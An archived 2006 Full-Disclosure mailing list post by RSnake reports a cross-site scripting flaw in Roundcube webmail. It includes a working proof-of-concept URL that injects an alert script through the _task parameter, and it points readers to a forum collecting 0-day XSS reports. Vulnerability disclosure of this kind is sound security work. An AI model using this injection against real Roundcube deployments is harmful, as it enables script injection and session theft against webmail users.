h at ckers
Nov 11, 2006, 10:51 AM
Views: 1759
Permalink
|
|
XSS in roundcube.com and users of it
|
|
There is an XSS vulnerability in roundcube webmail:
http://demo.roundcube.net/?_task=');alert(%22XSS%22)//
Btw, we've been posting 0-day XSS vulnerabilities at
http://sla.ckers.org/forum/list.php?3 to take it out of the full
disclosure list since lots of people don't want to see the sheer volume
of reports. We've got close to a thousand companies and counting.
We're just trying to cut down on the noise to people's inboxes. That is
all.
-RSnake
http://ha.ckers.org
http://sla.ckers.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
XSS in roundcube.com and users of it